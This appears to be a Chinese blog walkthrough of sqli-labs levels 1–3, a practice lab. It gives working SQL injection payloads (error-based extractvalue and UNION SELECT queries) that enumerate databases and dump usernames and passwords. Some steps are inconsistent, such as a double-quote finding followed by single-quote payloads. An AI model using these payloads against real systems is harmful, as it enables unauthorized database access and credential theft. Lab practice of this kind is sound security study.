sqli-lib1-3关教程

最新推荐文章于 2024-07-13 10:38:18 发布
最新推荐文章于 2024-07-13 10:38:18 发布
阅读量859 收藏 11
点赞数 18
文章标签: sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56109788/article/details/139179381
版权

SERIES-1

输入?id=1成功显示界面

image-20240524150506825

输入?id=2-1成功显示界面,但是页面发生改变,说明该数据类型为字符型

image-20240524150534620

加入单引号?id=2-1’,报错发现使用的单引号报错

image-20240524150600449

加上双引号?id=1",发现能够成功的显示,说明闭合符号为双引号

image-20240524150434643

1.联合注入,参考第二关

2.报错注入

利用报错注入查看所有数据库?id=1’ and (extractvalue(1,concat(0x7e,(select substr(group_concat(schema_name),63,31) from information_schema.schemata),0x7e))) --+

image-20240524155755937

查看当前数据库里面的所有表?id=1’ and (extractvalue(1,concat(0x7e,(select substr(group_concat(table_name),1,31) from information_schema.tables where table_schema=database()),0x7e))) --+

image-20240524155726166

查看user表里面的列?id=1’ and (extractvalue(1,concat(0x7e,(select substr(group_concat(column_name),60,31) from information_schema.columns where table_schema=database()),0x7e))) --+

image-20240524160419274

找到username和password

查看列里面的数据?id=1’ and (extractvalue(1,concat(0x7e,(select substr(group_concat(username,password),1,31) from security.users),0x7e))) --+

image-20240524160028235

SERIES-2

输入?id=1

image-20240524160538438

输入?id=2-1,两个页面相同,数据类型为数字型

image-20240524160614232

输入and 1=1

image-20240524160649262

输入?id=1 and 1=2 两个页面不同,说明该点存在注入点

image-20240524160723478

输入?id=1 order by 3

image-20240524161005605

输入?id=1 order by 4

image-20240524161101544

说明数据有三列,输入?id=-1 union select 1,2,3判断回显位

image-20240524161315972

回显位为2和3,输入?id=-1 union select 1,database(),version()查看当前数据库和数据库版本

image-20240524161422881

数据库名为security版本号为5.5.53,输入?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security’查看当前数据库中存在的表

image-20240524161605350
输入?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users’查看查看user表中的列

image-20240524161816439

输入?id=-1 union select 1,2,group_concat(username ,id , password) from users查看user表中的具体字段

image-20240524162004979

SERIES-3

输入?id=1

image-20240524162204797

输入?id=2-1,页面发生改变,说明是字符型

image-20240524170310552

输入?id=1’,报错,

image-20240524164501561

输入?id=1’')–+,不报错,说明闭合符号为单引号

image-20240524164925127

输入?id=1’) order by 3–+

image-20240524165155808

输入?id=1’) order by 4–+

image-20240524165243063

说明数据只有三列,输入?id=-1’) union select 1,2,3–+查看回显位

image-20240524165419560
注入过程参考SERIES-3

吃不饱的小胡
关注
  • 18
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-lib64笔记学习资料.zip
08-22
sqli-labs-1-65閫氬叧鏁欑▼share(by sm0nk).md》这个文件很可能包含了作者sm0nk在完成sqli-lib64所有65的过程中所记录的笔记和技巧。通过阅读这份文档,你可以了解到每个卡的键思路、解题方法以及可能遇到...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-lib靶场1-15教程
m0_56109788的博客
04-25 1158
sqli-lib靶场1-15教程
sqli-lib4-6教程
m0_56109788的博客
05-25 313
输入?id=1输入?id=2-1,说明该数据类型为字符型输入?id=1’输入?id=1",说明闭合符号为"输入?id=1")–+输入?输入?数据共三列,输入?回显位为2和3,输入?id=-1") union select 1,database(),version()–+查看当前数据库和数据库版本输入?
sqli-labs1-10心得与思路
m0_48294281的博客
03-08 6106
sqli-labs 1-11个人心得,欢迎交流指正。
sqli-labs通教程
m0_65150886的博客
01-23 1460
id=1返回正常页面?id=1'显示sql语句有误?id=1''页面返回正常,证明是字符型注入。因为该页面存在回显,所以我们可以使用联合查询。
sqli-labs通详解
m0_52051132的博客
10-15 6862
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
sqli-labs部署及sqli-labs靶场
WE_zzs的博客
02-01 385
注:若在配置环境中无法启动mysql,应是和本地mysql冲突,需改端口号。1.下载phpstudy,并进入软件 打开nginx和mysql。并将其写入靶场配置文件中。(默认密码是root)4.选择sql-connerctions文件。5.在打开db-creds.inc文本。解压至phpstudy的www目录下。2.在启动和下载完成后将。输入127.0.0.1,
sqli-lab闯第5---第10
qq_54037445的博客
10-06 1751
sqli-lab闯,get类型,时间盲注,布尔盲注,报错注入,详细讲解
sqli-labs靶场(1-22
weixin_51566481的博客
08-16 7460
sqli-labs,sql注入,burpsuit
sqli-labs靶场第七
喜欢创作各种技术类文章,希望可以帮到你
01-28 335
id=1' --+单引号报错,id=1" --+双引号不报错,可以判断是单引号闭合。id=1') --+也报错,尝试两个括号闭合,id=1')) --+不报错。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
如何解决 PostgreSQL 中由于索引不当导致的性能下降问题?
技术笔记
07-12 697
比如说,有一个订单表,其中“订单日期”这个列经常被用于按时间范围查询订单,但却没有为其创建索引,这就会导致数据库在查询时需要遍历整个表,极大地降低了查询速度。命令,我们可以查看查询的执行计划。再举一个例子,如果我们发现某个表上存在多个类似的索引,比如“idx_age_1”和“idx_age_2”,并且它们的定义几乎相同,这时候就可以考虑删除其中一个冗余的索引,以减少维护成本和提高性能。然而,就像任何复杂的系统一样,它也可能会遇到性能方面的挑战,其中由于索引不当导致的性能下降问题是比较常见且令人头疼的。
SQL笔试题【数据岗】
房东的猫的博客
07-11 254
题目 4:输出一张 dws 表,查询过去任意日期的曝光活跃用户的 7 日留存率,输出字 段日 期,用户 id,7 日留存率具体表结构如下表 1 用户行为表:t_user_video_action_d l分区:ds(格式 yyyyMMdd) l主键:user_id、video_id l含义:一个用户对一个视频的所有行为聚合,每天增量 字段名字段含义类型。题目 3:计算每个用户每天第一次曝光视频的时间戳,运行速度越快越好,输出字段 日期, 用户 id,时间戳。
【postgresql】视图(View)
一个写了10年bug的程序员日常笔记。
07-10 558
PostgreSQL 中的视图(View)是一种虚拟表,其内容由 SQL 查询定义。视图可以简化复杂的 SQL 操作,使得用户能够以一种更直观、更易于理解的方式来访问和操作数据。PostgreSQL 视图是只读的,因此可能无法在视图上执行 DELETE、INSERT 或 UPDATE 语句。但是可以在视图上创建一个触发器,当尝试 DELETE、INSERT 或 UPDATE 视图时触发,需要做的动作在触发器内容中定义。
MySQL 进阶(三)【SQL 优化】
最新发布
梦想是动物管理员
07-13 863
MySQL SQL 优化
sqli-labs-master前10
07-28
回答: 在sqli-labs-master前10中,可以使用不同的注入方法来获取数据库和表的信息。其中,联合查询、报错注入和sqlmap是常用的注入方法。联合查询可以通过判断注入点的类型、判断列数和使用order by语句来获取表名和字段名。报错注入可以通过使用extractvalue()函数来获取表名、字段名和字段的详细内容。而sqlmap是一款专门用于自动化注入的工具,可以通过指定参数和选项来获取数据库名、表名、字段名和字段的详细信息。在具体的卡中,可以根据题目要求和注入点的特点选择合适的注入方法来解决问题。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [【渗透测试】sqli-labs闯(1-10)](https://blog.csdn.net/qq_43168364/article/details/105496598)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [sqli-labs前十记录](https://blog.csdn.net/qq_43277152/article/details/113388041)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [sqli-labs(1-10)](https://blog.csdn.net/weixin_44268918/article/details/127181936)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值